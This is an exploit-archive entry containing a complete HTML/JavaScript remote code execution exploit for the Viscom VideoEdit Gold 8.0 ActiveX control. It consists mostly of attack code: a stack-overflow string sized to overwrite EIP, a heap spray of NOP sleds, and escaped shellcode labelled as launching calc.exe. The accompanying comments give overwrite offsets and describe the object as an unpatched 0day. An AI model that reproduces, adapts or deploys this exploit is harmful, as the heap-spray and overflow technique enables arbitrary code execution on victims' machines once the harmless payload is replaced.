Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit

2010-12-07T00:00:00
ID 1337DAY-ID-15067
Type zdt
Reporter Rew
Modified 2010-12-07T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ===============================================================
Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit
===============================================================

<!--
  
Title: Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit
Date: Dec 5, 2010
Author: Rew
Email: rew [splat] leethax.info
Link: http://www.viscomsoft.com/products/videoeditgold/index.html
Version: 8.0.0.0
Tested on: WinXP - IE 6
CVE: NA (0day)
  
Impact is relatively low due to object not marked safe for scripting.  You'll
need to change the default IE settings to let it run.
 
This is a plain vanilla stack overflow.  The file is...
"%PROGRAMFILES%\VideoEdit Gold ActiveX Control\VideoEdit.ocx"
I'm not using the SEH but here's the offsets just for kicks if you're interested.
 
[2311 junk] [ebp] [eip] [284 junk] [nseh] [seh]
  
-->
 
<object classid='clsid:57D9AF4C-23BA-47EC-A40B-2DA79641B285' id='target' /></object>
 
<script>
 
// Ctrl+C Ctrl+V, herpderp
 
// calc.exe
var shellcode = unescape(
    '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
    '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
    '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
    '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
    '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
    '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
    '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
    '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'
);
 
var nops = unescape('%u9090%u9090');
 
var headersize = 20;
var slackspace = headersize + shellcode.length;
 
while(nops.length < slackspace) {
    nops += nops;
}
 
var fillblock = nops.substring(0, slackspace);
var block = nops.substring(0, nops.length - slackspace);
 
while((block.length + slackspace) < 0x50000) {
    block = block + block + fillblock;
}
 
memory=new Array();
for(counter=0; counter<200; counter++){
    memory[counter] = block + shellcode;
}
 
var bof = '';
while(bof.length < 2312){
    bof += 'A';
}
bof += 'BBBB'; // EBP
bof += "\x0c\x0c\x0c\x0c"; // EIP
 
document.getElementById('target').RMLoadProfiles( bof );
 
</script>



#  0day.today [2018-01-10]  #